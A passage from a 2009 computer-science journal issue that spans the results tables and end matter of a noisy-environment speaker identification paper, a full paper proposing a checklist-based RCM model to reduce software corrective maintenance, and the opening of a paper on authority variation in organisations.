The optimal values of the critical parameters of the GA were chosen carefully through various experiments. In a noiseless environment, the crossover rate and the number of generations were both found to be 5. The performance analysis has been carried out for the text-dependent speaker identification system.
To measure the performance of the proposed system, the NOIZEOUS speech database [37, 38] has been used. It contains eight different types of environmental noise (Airport, Babble, Car, Exhibition Hall, Restaurant, Street, Train and Train Station) at four different SNRs: 0 dB, 5 dB, 10 dB and 15 dB. All of these environmental conditions and SNRs have been accounted for in the following experimental analysis.
TABLE I. AIRPORT NOISE AVERAGE IDENTIFICATION RATE (%) FOR NOIZEOUS SPEECH CORPUS

SNR     MFCC    ΔMFCC   ΔΔMFCC  RCC     LPCC
15dB 89.00 86.33 63.33 65.33 75.67
10dB 86.00 84.43 58.43 60.43 69.33
5dB 75.33 81.00 50.33 60.33 60.43
0dB 68.89 75.29 43.33 56.17 58.29
Average 79.81 81.76 53.86 60.57 65.93
TABLE II. BABBLE NOISE AVERAGE IDENTIFICATION RATE (%) FOR NOIZEOUS SPEECH CORPUS

SNR     MFCC    ΔMFCC   ΔΔMFCC  RCC     LPCC
15dB 80.00 90.00 63.33 63.33 76.67
10dB 76.67 86.67 53.33 56.67 70.00
5dB 63.33 73.33 46.67 56.67 70.00
0dB 73.33 63.33 46.67 53.33 63.33
Average 73.33 78.33 52.50 57.50 70.00
TABLE III. CAR NOISE AVERAGE IDENTIFICATION RATE (%) FOR NOIZEOUS SPEECH CORPUS

SNR     MFCC    ΔMFCC   ΔΔMFCC  RCC     LPCC
15dB 76.67 89.43 63.33 73.33 76.67
10dB 73.33 83.67 53.33 63.33 70.00
5dB 63.33 73.33 53.33 63.33 70.00
0dB 63.33 63.33 46.67 53.33 60.00
Average 69.17 77.44 54.17 63.33 69.17
TABLE IV. EXHIBITION HALL NOISE AVERAGE IDENTIFICATION RATE (%) FOR NOIZEOUS SPEECH CORPUS

SNR     MFCC    ΔMFCC   ΔΔMFCC  RCC     LPCC
15dB 90.00 91.67 76.67 80.00 87.67
10dB 83.33 83.33 63.33 76.67 76.67
5dB 76.67 80.00 76.67 76.67 73.33
0dB 73.33 76.67 53.33 63.33 70.00
Average 80.83 82.92 67.50 74.17 76.92
TABLE V. RESTAURANT NOISE AVERAGE IDENTIFICATION RATE (%) FOR NOIZEOUS SPEECH CORPUS

SNR     MFCC    ΔMFCC   ΔΔMFCC  RCC     LPCC
15dB 85.00 91.00 53.33 83.33 83.33
10dB 80.00 80.00 53.33 76.67 73.33
5dB 73.33 76.67 50.43 63.33 73.33
0dB 60.00 65.33 46.67 63.33 63.33
Average 74.58 78.25 50.94 71.67 73.33
TABLE VI. STREET NOISE AVERAGE IDENTIFICATION RATE (%) FOR NOIZEOUS SPEECH CORPUS

SNR     MFCC    ΔMFCC   ΔΔMFCC  RCC     LPCC
15dB 83.33 90.00 63.33 76.67 83.33
10dB 76.67 80.00 56.67 63.33 73.33
5dB 73.33 76.67 53.33 76.67 73.33
0dB 63.33 73.33 46.67 63.33 63.33
Average 74.17 80.00 55.00 70.00 73.33
TABLE VII. TRAIN NOISE AVERAGE IDENTIFICATION RATE (%) FOR NOIZEOUS SPEECH CORPUS

SNR     MFCC    ΔMFCC   ΔΔMFCC  RCC     LPCC
15dB 90.00 91.33 63.33 73.33 85.00
10dB 80.00 85.00 53.33 70.00 76.67
5dB 66.67 86.67 53.33 63.33 63.33
0dB 66.67 73.33 46.67 66.67 63.33
Average 75.84 84.08 54.17 68.33 72.08
TABLE VIII. TRAIN STATION NOISE AVERAGE IDENTIFICATION RATE (%) FOR NOIZEOUS SPEECH CORPUS

SNR     MFCC    ΔMFCC   ΔΔMFCC  RCC     LPCC
15dB 86.67 90.00 53.33 70.00 76.67
10dB 76.67 76.67 53.33 66.67 73.33
5dB 63.33 66.67 46.67 56.67 63.33
0dB 60.00 63.33 46.67 53.33 60.00
Average 71.67 74.17 50.00 61.67 68.33
Table IX shows the overall average speaker identification rate for the NOIZEOUS speech corpus. From the table it is easy to compare the performance of the MFCC, ΔMFCC, ΔΔMFCC, RCC and LPCC methods for the DHMM-based codebook technique. ΔMFCC shows greater performance (79.62%) than any of the other methods.
TABLE IX. OVERALL AVERAGE SPEAKER IDENTIFICATION RATE (%) FOR NOIZEOUS SPEECH CORPUS

Noise                   MFCC    ΔMFCC   ΔΔMFCC  RCC     LPCC
Airport Noise 79.81 81.76 53.86 60.57 65.93
Babble Noise 73.33 78.33 52.50 57.50 70.00
Car Noise 69.17 77.44 54.17 63.33 69.17
Exhibition Hall Noise 80.83 82.92 67.50 74.17 76.92
Restaurant Noise 74.58 78.25 50.94 71.67 73.33
Street Noise 74.17 80.00 55.00 70.00 73.33
Train Noise 75.84 84.08 54.17 68.33 72.08
Train Station Noise 71.67 74.17 50.00 61.67 68.33
Average Identification Rate (%)   74.93   79.62   54.77   65.91   71.14
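The overall averages in Table IX can be re-derived from the per-noise rows above; for instance, for the two strongest feature sets:

```python
# Re-deriving the "Average Identification Rate" row of Table IX from the
# per-noise averages listed in the rows above (Airport ... Train Station).
delta_mfcc = [81.76, 78.33, 77.44, 82.92, 78.25, 80.00, 84.08, 74.17]
mfcc = [79.81, 73.33, 69.17, 80.83, 74.58, 74.17, 75.84, 71.67]

avg = lambda xs: round(sum(xs) / len(xs), 2)
print(avg(delta_mfcc))  # 79.62, the overall rate reported for ΔMFCC
print(avg(mfcc))        # ≈ 74.93, the overall rate reported for MFCC
```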
VIII. CONCLUSION AND OBSERVATION
The experimental results reveal that the proposed codebook design method yields about a 93.00% identification rate in noiseless environments and 79.62% in noisy environments, which is higher than previous techniques based on the LBG clustering method. However, a benchmark comparison is needed to establish the superiority of the proposed method, and this is underway. In speaker identification, noise is a common factor that significantly influences performance; in this work, an efficient noise-removal technique has been used to enhance the performance of the proposed GA-based codebook design method, making it capable of protecting the system from noise distortion. Testing the system with a large speech database remains the future work of this system.
REFERENCES
[1] Rabiner, L., and Juang, B.-H., Fundamentals of Speech Recognition . Prentice Hall, Englewood Cliffs, New Jersey, 1993.
[2] Jain, A., R.P.W.Duin, and J.Mao., “Statistical pattern recognition: areview”, IEEE Trans. on Pattern Analysis and Machine Intelligence 22,2000, pp. 4–37.
[3] Sadaoki Furui, “50 Years of Progress in Speech and Speaker Recognition Research”, ECTI TRANSACTIONS ON COMPUTER AND INFORMATION TECHNOLOGY, vol.1, no.2, 2005.
[4] Rabiner, L.R., and Juang, B.H., “An introduction to hidden Markovmodels”, IEEE ASSP Mag., 3, (1), 1986, pp. 4–16.
[5] Matsui, T., and Furui, S., “Comparison of text-dependent speaker recognition methods using VQ-distortion and discrete=continuousHMMs”, Proc. ICASSP’92, vol. 2, 1992, pp. 157–160.
[6] Y. Linde, A. Buzo, and R.M. Gray, "An Algorithm for Vector Quantizer Design", IEEE Transactions on Communications, vol. 28, 1980, pp. 84-95.
[7] J. G. Wilpon and L. R. Rabiner, "A modified K-means clustering algorithm for use in isolated word recognition", IEEE Trans. on Acoust., Speech, and Signal Processing, vol. ASSP-33, 1985, pp. 587-594.
[8] H. Iwamida, S. Katagiri, E. McDermott, and Y. Tohokura, “A hybridspeech recognition system using HMMs with an LVQ-trainedcodebook”, Proc. IEEE Int. Conf. Acoust.. Speech. Signal Processing,1990, pp. 489-492.
[9] Simon Doclo and Marc Moonen, “On the Output SNR of the Speech-Distortion Weighted Multichannel Wiener Filter”, IEEE SIGNALPROCESSING LETTERS, vol. 12, no. 12, 2005.
[10] Wiener, N., Extrapolation, Interpolation and Smoothing of Stationary Time Series with Engineering Applications. Wiley, New York, 1949.
[11] Wiener, N., Paley, R. E. A. C., “Fourier Transforms in the ComplexDomains”, American Mathematical Society, Providence, RI, 1934.
[12] Koji Kitayama, Masataka Goto, Katunobu Itou and TetsunoriKobayashi, “Speech Starter: Noise-Robust Endpoint Detection by UsingFilled Pauses”, Eurospeech 2003, Geneva, 2003, pp. 1237-1240.
[13] S. E. Bou-Ghazale and K. Assaleh, “A robust endpoint detection of speech for noisy environments with application to automatic speechrecognition”, Proc. ICASSP2002, vol. 4, 2002, pp. 3808–3811.
[14] Martin, D. Charlet, and L. Mauuary, “Robust speech / non-speechdetection using LDA applied to MFCC”, Proc. ICASSP2001, vol. 1,2001, pp. 237–240.
[15] Richard. O. Duda, Peter E. Hart, David G. Strok, Pattern Classification,A Wiley-interscience publication. John Wiley & Sons, Inc, SecondEdition, 2001.
[16] Sarma, V., Venugopal, D., “Studies on pattern recognition approach tovoiced-unvoiced-silence classification”, Acoustics, Speech, and SignalProcessing, IEEE International Conference on ICASSP '78, vol. 3, 1978,
pp. 1-4.
[17] Qi Li. Jinsong Zheng, Augustine Tsai, Qiru Zhou, “Robust EndpointDetection and Energy Normalization for Real-Time Speech and Speaker Recognition”, IEEE Transaction on speech and Audion Processing,vol.10, no.3, 2002.
[18] Harrington, J., and Cassidy, S., Techniques in Speech Acoustics. Kluwer Academic Publishers, Dordrecht, 1999.
[19] Makhoul, J., “Linear prediction: a tutorial review”, Proceedings of theIEEE 64, 4, 1975, pp. 561–580.
[20] Picone, J., “Signal modeling techniques in speech recognition”,Proceedings of the IEEE 81, 9, 1993, pp. 1215–1247.
[21] Claudio Becchetti and Lucio Prina Ricotti, Speech Recognition Theory and C++ Implementation. John Wiley & Sons Ltd., 1999, pp. 124-136.
[22] L.P. Cordella, P. Foggia, C. Sansone, M. Vento., “A Real-Time Text-Independent Speaker Identification System”, Proceedings of 12thInternational Conference on Image Analysis and Processing, IEEE
Computer Society Press, Mantova, Italy, 2003, pp. 632 - 637.
[23] J. R. Deller, J. G. Proakis, and J. H. L. Hansen, Discrete-TimeProcessing of Speech Signals. Macmillan, 1993.
[24] F. Owens., Signal Processing Of Speech. Macmillan New electronics.Macmillan, 1993.
[25] F. Harris, “On the use of windows for harmonic analysis with thediscrete fourier transform”, Proceedings of the IEEE 66, vol.1, 1978,
pp.51-84.
[26] J. Proakis and D. Manolakis, Digital Signal Processing, Principles,Algorithms and Aplications. Second edition, Macmillan PublishingCompany, New York, 1992.
[27] D. Kewley-Port and Y. Zheng, "Auditory models of formant frequency discrimination for isolated vowels", Journal of the Acoustical Society of America, 103(3), 1998, pp. 1654–1666.
[28] D. O’Shaughnessy, Speech Communication - Human and Machine.Addison Wesley, 1987.
[29] E. Zwicker., “Subdivision of the audible frequency band into critical bands (frequenzgruppen)”, Journal of the Acoustical Society of America,33, 1961, pp. 248–260.
[30] S. Davis and P. Mermelstein, “Comparison of parametric representations
for monosyllabic word recognition in continuously spoken sentences”,IEEE Transactions on Acoustics Speech and Signal Processing, 28,1980, pp. 357–366.
[31] S. Furui., “Speaker independent isolated word recognition usingdynamic features of the speech spectrum”, IEEE Transactions onAcoustics, Speech and Signal Processing, 34, 1986, pp. 52–59.
[32] S. Furui, “Speaker-Dependent-Feature Extraction, Recognition andProcessing Techniques”, Speech Communication, vol. 10, 1991, pp.505-520.
[33] Koza, J .R., Genetic Programming: On the programming of computers by means of natural selection. Cambridge: MIT Press, 1992.
[34] D.E. Goldberg, Genetic Algorithms in Search, Optimization andMachine Learning. Addison- Wesley, Reading, MA, 1989.
[35] Z. Michalewicz, Genetic Algorithms + Data Structures = EvolutionPrograms. Springer-Verlag, New York, USA, Third Edition, 1999.
[36] Rajesskaran S. and Vijayalakshmi Pai, G.A., Neural Networks, FuzzyLogic, and Genetic Algorithms- Synthesis and Applications. Prentice-Hall of India Private Limited, New Delhi, 2003.
[37] Hu, Y. and Loizou, P., "Subjective comparison of speech enhancement algorithms", Proceedings of ICASSP-2006, I, Toulouse, France, 2006, pp. 153-156.
[38] Hu, Y. and Loizou, P., “Evaluation of objective measures for speechenhancement”, Proceedings of INTERSPEECH-2006, Philadelphia, PA,2006.
AUTHORS PROFILE
Md. Rabiul Islam was born in Rajshahi, Bangladesh, on December 26, 1981. He received his B.Sc. degree in Computer Science & Engineering and his M.Sc. degree in Electrical & Electronic Engineering from Rajshahi University of Engineering & Technology, Bangladesh, in 2004 and 2008, respectively. From 2005 to 2008, he was a Lecturer in the Department of Computer Science & Engineering at Rajshahi University of Engineering & Technology. Since 2008, he has been an Assistant Professor in the Department of Computer Science & Engineering, Rajshahi University of Engineering & Technology, Bangladesh. His research interests include bio-informatics, human-computer interaction, and speaker identification and authentication in neutral and noisy environments.
Md. Fayzur Rahman was born in 1960 in Thakurgaon, Bangladesh. He received the B.Sc. Engineering degree in Electrical & Electronic Engineering from Rajshahi Engineering College, Bangladesh, in 1984 and the M.Tech degree in Industrial Electronics from S. J. College of Engineering, Mysore, India, in 1992. He received the Ph.D. degree in energy and environment electromagnetics from Yeungnam University, South Korea, in 2000. Following his graduation he rejoined his previous post at BIT Rajshahi. He is a Professor in Electrical & Electronic Engineering at Rajshahi University of Engineering & Technology (RUET). His current research interests are Digital Signal Processing, Electronics & Machine Control, and High Voltage Discharge Applications. He is a member of the Institution of Engineers (IEB), Bangladesh, the Korean Institute of Illuminating and Installation Engineers (KIIEE), and the Korean Institute of Electrical Engineers (KIEE), Korea.
A Step towards Software Corrective Maintenance:
Using RCM Model

Shahid Hussain
Department of Computing, Namal College
Mianwali, Pakistan
Shahidhussain2003@yahoo.com

Muhammad Zubair Asghar
ICIT, Gomal University
Dera Ismail Khan, Pakistan
zubair_icit@yahoo.com

Bashir Ahmad
ICIT, Gomal University
Dera Ismail Khan, Pakistan
bashahmad@gmail.com

Shakeel Ahmad
ICIT, Gomal University
Dera Ismail Khan, Pakistan
Shakeel_1965@yahoo.com
Abstract--From the earliest stage of software engineering, the selection and enforcement of appropriate standards has remained a challenge for stakeholders throughout the entire cycle of software development, yet it can reduce the effort required in the software maintenance phase. Corrective maintenance is the reactive modification of a software product performed after delivery to correct discovered faults. Studies conducted by different researchers reveal that approximately 50 to 75% of total effort is spent on maintenance, out of which about 17 to 21% is spent on corrective maintenance. In this paper, the authors propose an RCM (Reduce Corrective Maintenance) model, which describes the implementation of a set of checklists to guide the stakeholders of all phases of software development. These checklists are to be filled in by the corresponding stakeholders of each phase before it starts. Precise use of the checklist in the relevant phase ensures successful enforcement of analysis, design, coding and testing standards, reducing errors in the operation stage. Moreover, the authors present the step-by-step integration of the checklists into the software development life cycle through the RCM model.

Keywords—RCM model, Maintenance, Checklist, Corrective maintenance, Stakeholders
I. INTRODUCTION

The selection and proper enforcement of standards has been a challenging task from the early stages of software engineering, and it has not received due attention from the concerned stakeholders. Software maintenance takes more effort than all other phases of the software life cycle, yet it has not been given the importance it deserves. It is widely accepted that approximately 60 to 70% of effort is spent on the maintenance phase of the software development life cycle. Software maintenance is classified into corrective, adaptive, perfective and preventive maintenance. According to IEEE [2, 3], corrective maintenance is the reactive modification of a software product performed after delivery to correct discovered faults; adaptive maintenance is the modification of a software product performed after delivery to keep the software usable in a changed or changing environment; perfective maintenance is the modification of a software product after delivery to improve performance or maintainability; and preventive maintenance is performed for the purpose of preventing problems before they occur. In this paper the authors focus on corrective maintenance, to overcome the problems arising in requirements, design, coding, documentation and testing activities.

According to Yogesh [1], software maintenance cost breaks down as 50% for perfective maintenance, 25% for adaptive maintenance, 21% for corrective maintenance and 4% for preventive maintenance. In this paper the authors propose an RCM model to reduce maintenance cost by incorporating checklists for the concerned stakeholders of each phase of the software development life cycle. This would reduce the post-delivery effort made by stakeholders during corrective maintenance and decrease the corrective-maintenance effort percentage reported by Yogesh [1].
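The effort split cited above can be sanity-checked with a small calculation. This is a sketch with hypothetical numbers: the 1000 person-hour project total and the 70% maintenance share are assumptions for illustration, not figures from the paper.

```python
# Sanity-checking the cited effort split with hypothetical numbers:
# a 1000 person-hour project and a 70% maintenance share are assumptions.
total_effort = 1000.0                    # person-hours (hypothetical)
maintenance = total_effort * 0.70        # upper end of the 60-70% figure

# Breakdown of maintenance effort as reported by Yogesh [1]
split = {"perfective": 0.50, "adaptive": 0.25, "corrective": 0.21, "preventive": 0.04}
effort = {kind: maintenance * frac for kind, frac in split.items()}

print(effort["corrective"])  # 147.0 person-hours go to corrective maintenance
```

Even a modest reduction of this 21% slice therefore translates into a noticeable saving on the whole project.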
II. SOFTWARE MAINTENANCE

Software maintenance is the process of correcting the faults that arise in a software product after its delivery. The IEEE [2, 3] definition of software maintenance is:

The modification of a software product after delivery to correct faults, to improve performance or other attributes, or to adapt the product to a modified environment.

It has been observed in different studies that software maintenance is the most time-consuming activity in the SDLC; Figure-1 shows the maintenance iceberg depicting the time-consuming nature of software maintenance. Software must be modified when it no longer fulfils the needs of the environment in which it works.
(IJCSIS) International Journal of Computer Science and Information Security
Vol. 4, No. 1 & 2, 2009
Different models and techniques have been proposed by researchers in the area of software corrective maintenance [4, 5, 6]. Walia and Carver proposed a catalog [7] to aid developers in reducing errors during the requirement inspection process and to improve overall software quality. The study of Jie-Cherng Chen and Sun-Jen Huang [8] shows empirical evidence for the problem factors that are faced during the software development phase and negatively affect software maintainability. Similarly, Andrea De Lucia et al. [9] provided an empirical assessment and improvement of an effort estimation model for corrective maintenance. The authors' proposed model provides an easy, sequential procedure for integrating checklists into the SDLC to reduce the effort of software corrective maintenance.
III. RCM MODEL

The work of the software development life cycle is divided into five main phases: requirement elicitation, requirement specification, design, coding and testing. If, in any phase, the roles are not properly guided in their activities, the effort required for maintenance of the software, especially corrective maintenance, can increase. In this paper the authors use the RCM model to provide guidelines to the concerned stakeholders of each phase of the software development life cycle. The working of the RCM model is represented in Figure-2. Before the start of each phase, the concerned stakeholders fill in a checklist which guides them on the standard methods for performing their activities. If all concerned stakeholders of each phase work according to the guidelines of the checklist, the total effort required for software corrective maintenance can be reduced.

The stakeholders of the requirement elicitation phase fill in the checklist shown in Table-1 before the start of their work. The evaluation result of this checklist shows whether all requirements are clear and understandable to the concerned stakeholders; this reduces the chance of errors arising from ambiguities in the requirement elicitation process. The stakeholders of the requirement specification phase fill in the checklist shown in Table-2 before the start of their work. The evaluation result of this checklist shows whether the specification of requirements is understandable to the concerned stakeholders, reducing the chance of errors arising from improper specification of requirements. The stakeholders of the design phase fill in the checklist shown in Table-3 before the start of their work. The evaluation result of this checklist shows whether the architectural, data, procedural and user-interface design of the software is understandable to the concerned stakeholders, reducing the chance of errors arising from a lack of proper understanding of design activities. The stakeholders of the coding phase fill in the checklist shown in Table-4 before the start of their work. The evaluation result of this checklist shows whether the coding standard features are understandable to the concerned stakeholders, reducing the chance of errors arising from a lack of proper understanding of coding constructs. The stakeholders of the testing phase fill in the checklist shown in Table-5 before the start of their work. The evaluation result of this checklist shows whether the software will be tested in every respect, reducing the chance of errors arising from an improper testing process.
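As an illustration, a checklist of this kind and its evaluation can be sketched in a few lines of Python. This is not part of the RCM model itself: the item texts follow Table-1, but the dictionary representation, the `evaluate` helper and the 0.8 readiness threshold are assumptions made for the sake of the example.

```python
# A sketch (not from the paper) of representing and evaluating an RCM-style
# checklist. Item texts follow Table-1; the 0.8 threshold is an assumption.
RE_CHECKLIST = {
    "RE-1": "Natural language for requirement gathering is understandable",
    "RE-2": "No requirement is repeated",
    "RE-3": "Each requirement is clear and accurate",
}

def evaluate(answers):
    """answers maps an activity code to True (Yes) or False (No)."""
    yes = sum(1 for code in RE_CHECKLIST if answers.get(code, False))
    score = yes / len(RE_CHECKLIST)
    return score, score >= 0.8      # the phase starts only above the threshold

score, ready = evaluate({"RE-1": True, "RE-2": True, "RE-3": False})
print(ready)  # False: the stakeholder needs more guidance before the phase starts
```

The same structure would apply to the RS, design, coding and testing checklists, with one dictionary per phase.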
[Figure-1, the maintenance iceberg, shows development as the visible tip and maintenance as the submerged mass.]
Figure-1. Maintenance Iceberg (Martin and McClure, 1983)

[Figure-2 maps the SDLC phases (Requirement Elicitation, Requirement Specification, Design, Coding, Testing) to their respective check-lists and the stakeholders who fill them in.]
Figure-2. RCM Model for Software Corrective Maintenance
The checklist for the requirement elicitation phase enables the concerned stakeholders to identify the requirements in a clear and precise way. Repetition in the gathered requirements should be avoided, and the requirements should be easy to understand in the recommended natural language. Moreover, dependencies among requirements should be clear, and once requirement elicitation is complete, no further requirements may be gathered. If the concerned stakeholder, such as the system analyst, follows this checklist precisely, then errors that can arise from inconsistencies and repetition can be avoided, which directly reduces the corrective maintenance effort. The Yes and No columns of Table-1 record whether each point of the checklist is clearly understood by the concerned stakeholders, and the checklist is analyzed on the basis of these values. The same scheme is used for the other checklists.
The checklist for the requirement specification phase enables the concerned stakeholders to use proper methods for the specification of requirements. It ensures that the SRS is clear and understandable to all stakeholders. The stakeholders of this phase should have sufficient knowledge of formal and informal specification and of its tools or languages.
TABLE-2. CHECKLIST FOR STAKEHOLDERS OF REQUIREMENT SPECIFICATION PHASE

ACTIVITY CODE DESCRIPTION YES NO
RS-1 The structure of the SRS is clear and understandable
RS-2 Knowledge of informal specification of requirements
RS-3 Knowledge of formal specification of requirements
RS-4 Use of an informal specification tool or language
RS-5 Use of a formal specification tool or language
RS-6 The SRS is clear to all stakeholders
RS-7 Data, functional and behavioral modeling is understandable

The checklist for the design phase enables the concerned stakeholders to perform both back-end and front-end design of the software in a precise form. This checklist makes the transformation of the analysis model into the different design models (architectural, data, procedural and user-interface design) easy and understandable. The relationships among modules should be clear and understandable to all stakeholders.

TABLE-3. CHECKLIST FOR STAKEHOLDERS OF DESIGN PHASE

ACTIVITY CODE DESCRIPTION YES NO
D-1 The SRS is clear and understandable
D-2 The architectural design of the software is clear and users have performed acceptance testing
D-3 Black-box testing on the architectural design has been performed
D-4 The database design is proper and understandable
D-5 Relationships among dependent modules are clear
D-6 The user-interface design is accepted by the user
D-7 The data dictionary is clear and properly designed
D-8 The design strategy, either top-down or bottom-up, is clear
D-9 Standards for procedural design are clear

TABLE-1. CHECKLIST FOR STAKEHOLDERS OF REQUIREMENT ELICITATION PHASE

ACTIVITY CODE DESCRIPTION YES NO
RE-1 The natural language used for requirement gathering is understandable
RE-2 No requirement is repeated
RE-3 Each requirement is clear and accurate
RE-4 The source of each dependent requirement is identifiable
RE-5 All sources for collecting requirements are known
RE-6 Full detail of each requirement is taken from the customer
RE-7 No customer requirement is entertained after all requirements have been collected and a new phase has started
The checklist for the coding phase enables the concerned stakeholders to clearly understand the basic constructs of the programming language, such as variables, arrays and functions. Moreover, this checklist ensures that the text-validation process and the exception-handling process are clear to the concerned stakeholders.

TABLE-4. CHECKLIST FOR STAKEHOLDERS OF CODING PHASE

ACTIVITY CODE DESCRIPTION YES NO
C-1 Each variable is correctly typed
C-2 The data structures used are clear
C-3 The scope of all variables is clear
C-4 Variables are initialized without garbage values
C-5 Buffer sizes are appropriate
C-6 Buffer overflows are properly checked
C-7 Function signatures are understandable
C-8 Functions are properly called
C-9 The use of formal and actual parameters is clear
C-10 Recursive functions are properly called and terminated
C-11 All other constructs of the programming language are properly used
C-12 The use of third-party controls is valid
C-13 All database files are properly opened or closed when control is transferred from one module to another
C-14 Proper validation rules and validation text are defined
C-15 Exception handling is properly embedded into the program structure

The checklist for the testing phase enables the concerned stakeholders to clearly understand the testing methods, such as white-box, grey-box and black-box testing. Moreover, this checklist ensures that all testing activities are done properly and are understandable to all stakeholders.

TABLE-5. CHECKLIST FOR STAKEHOLDERS OF TESTING PHASE

ACTIVITY CODE DESCRIPTION YES NO
T-1 Unit testing of each component is properly performed
T-2 Module-level testing is properly performed
T-3 Modules are properly integrated and tested
T-4 The function of each module is tested through functional testing
T-5 In white-box testing, each path is clearly defined
T-6 The use of all constructs of the programming language is properly tested
T-7 The functional requirements of users are tested

IV. IMPLEMENTATION PLAN

The implementation process of the RCM model has been started, as shown in Figure-3. Two teams of students are used to develop the same project. The development experience level of all the students in both teams is the same. The development and maintenance process for the first project will be ordinary, while in the second project the development and maintenance team will follow the rules of the RCM model, and the results will be analyzed. The stakeholders of the team using the RCM model are trained to understand the purpose of the checklists. For example, if a programmer cannot understand the use of buffers, multi-threading, recursive calling, parameter scope and access, or multi-tasking, then he cannot fill in the related checklist effectively. Before the start of the project, only the stakeholders of the requirement elicitation phase will be trained. When requirement elicitation is about to end, parallel training of the next phase's stakeholders will start, and this process will continue until the end of software development. This strategy helps to reduce the extra time consumed on stakeholders' training. The project manager will be responsible for overseeing the work on both projects and analyzing the results.

Different factors are targeted to analyze the performance of the RCM model, such as quality, defect rates, reduction in effort, cost, complexity, productivity and reliability.
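The analysis step could, for instance, compare the two teams on one of the targeted factors. The sketch below uses post-delivery defect counts as a proxy for corrective maintenance effort; the function name and all numbers are invented for illustration, since the paper reports no measured data.

```python
# Comparing the two teams on one targeted factor; all numbers are invented,
# and post-delivery defect counts stand in as a proxy for corrective effort.
def corrective_effort_reduction(defects_ordinary, defects_rcm):
    """Relative reduction in post-delivery defects for the RCM team."""
    return (defects_ordinary - defects_rcm) / defects_ordinary

reduction = corrective_effort_reduction(defects_ordinary=40, defects_rcm=28)
print(f"{reduction:.0%}")  # 30%
```

The project manager would compute such a ratio per factor (defect rate, effort, cost, and so on) to judge whether the RCM model pays off.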
V. CONCLUSION

The software maintenance process consumes half of the budget and time needed to complete a software project, and usually 21% of total maintenance effort is devoured by corrective maintenance. Corrective maintenance effort increases due to flaws remaining from the other phases of the software development life cycle. These flaws can be overcome if stakeholders fully understand the activities of each concerned phase. The authors have proposed an RCM model which comprises the filling-in and analysis of checklists in each phase. If all stakeholders of each phase fill in the checklist precisely, the evaluated result of each checklist shows how well the stakeholders have understood the activities. Such a process would reduce the corrective maintenance effort, which drives up the overall effort percentage of software maintenance. The RCM model is in its infancy; it presents an idea of how to reduce software corrective maintenance effort. Moreover, the checklists of the RCM model can be updated by the stakeholders who apply the model during the software development process.
REFERENCES

[1] Yogesh Singh and Bindu Goel, "A Step Towards Software Preventive Maintenance", ACM SIGSOFT Software Engineering Notes, Volume 32, Number 4, July 2007.
[2] IEEE, "IEEE Standard for Software Maintenance", IEEE Std 1219-1998, The Institute of Electrical and Electronics Engineers, Inc., 1998.
[3] IEEE, "IEEE Standard for Software Maintenance", IEEE Std 14764-2006, The Institute of Electrical and Electronics Engineers, Inc., 2006.
[4] Scott D. Fleming et al., "A study of student strategies for the corrective maintenance of concurrent software", ICSE '08: Proceedings of the 30th International Conference on Software Engineering, ACM, May 2008.
[5] Mariam Sensalire et al., "Classifying desirable features of software visualization tools for corrective maintenance", SoftVis '08: Proceedings of the 4th ACM Symposium on Software Visualization, ACM, September 2008.
[6] Mira Kajko-Mattsson, Stefan Forssander, Ulf Olsson, "Corrective maintenance maturity model (CM3): maintainer's education and training", ICSE '01: Proceedings of the 23rd International Conference on Software Engineering, IEEE Computer Society, July 2001.
[7] Gursimran Singh Walia and Jeffrey C. Carver, "A systematic literature review to identify and classify software requirement errors", Information and Software Technology 51 (2009) 1087-1109, Elsevier B.V. <http://www.elsevier.com/locate/infsof>
[8] Jie-Cherng Chen and Sun-Jen Huang, "An empirical analysis of the impact of software development problem factors on software maintainability", The Journal of Systems and Software 82 (2009) 981-992, Elsevier Inc. <http://www.elsevier.com/locate/jss>
[9] Andrea De Lucia, Eugenio Pompella, Silvio Stefanucci, "Assessing effort estimation models for corrective maintenance through empirical studies", Information and Software Technology 47 (2005) 3-15. <http://www.elsevier.com/locate/infsof>
[Figure-3 shows the implementation strategy: both teams develop the same project; Team 1 uses the ordinary development and maintenance process, while Team 2 uses the RCM model in its development and maintenance process, with the checklists filled in by the related stakeholders; the project manager oversees the work of both teams and analyzes the targeted factors such as reliability, maintainability, productivity and complexity.]
Figure-3. Flow graph for Implementation Strategy
Mr. Shahid Hussain completed an MS in Software Engineering at City University, Peshawar, Pakistan, with distinction throughout his academic career. His research concerns introducing best practices into different software process models; he has introduced a new role-communication model in RUP using pair programming as a best practice. He is currently working as course chair cum Lecturer at Namal College, an associate college of the University of Bradford. He has published many research papers in national and international journals and conferences such as MySec04, JDCTA, IJCSIS, NCICT and ZABIST. He has also worked as a computer programmer with SRDC (British Council), Peshawar, Pakistan, and has developed many software systems. His future aim is to join an organization where he can polish his abilities.
Dr. Shakeel Ahmad received his B.Sc. with distinction from Gomal University, Pakistan (1986) and his M.Sc. (Computer Science) from Quaid-e-Azam University, Pakistan (1990). He served for 10 years as a Lecturer at the Institute of Computing and Information Technology (ICIT), Gomal University, Pakistan, where he has been an Assistant Professor since 2001 and is among the senior faculty members. He received his PhD degree (2007) for the performance analysis of a finite-capacity queue under a complex buffer management scheme. His research has mainly focused on developing cost-effective analytical models for measuring the performance of complex queueing networks with finite capacities. His research interests include performance modelling, optimization of congestion control techniques, software refactoring, network security, routing protocols and electronic learning. He has produced many publications in journals of international repute and has also presented papers at international conferences.
Mr. Muhammad Zubair Asghar is an MS student at the Institute of Computing and Information Technology, Gomal University, Dera Ismail Khan, Pakistan, with distinction throughout his academic career. He is specializing in the area of software corrective maintenance. He has also worked in the area of artificial intelligence and has two international publications in the areas of robot simulation and medical expert systems.
(IJCSIS) International Journal of Computer Science and Information Security,
Vol.4, No. 1 & 2, 2009
Electronic Authority Variation

M. N. Doja
CSE Department
Jamia Millia Islamia, New Delhi, India
ndoja@yahoo.com

Dharmender Saini
CSE Department
Jamia Millia Islamia, New Delhi, India
dsaini77@yahoo.com
Abstract— When a person joins an organization, he becomes authorized to take some decisions on behalf of that organization; that is, he is given some authority to exercise. After some time, on the basis of his performance in the organization, he is promoted and becomes eligible to exercise higher authorities. Further on, he may get another promotion, or he may leave the organization. So, during his stay in the organization, the authority of that person varies from the time he joins until he or she leaves. This paper presents the variation in the authorities of a person in an organization. The method implements a queuing model to analyze the people in the queue for their promotion and examines various parameters such as average waiting time.

Keywords- Authority, Authority Variation, Authority Level
I. INTRODUCTION

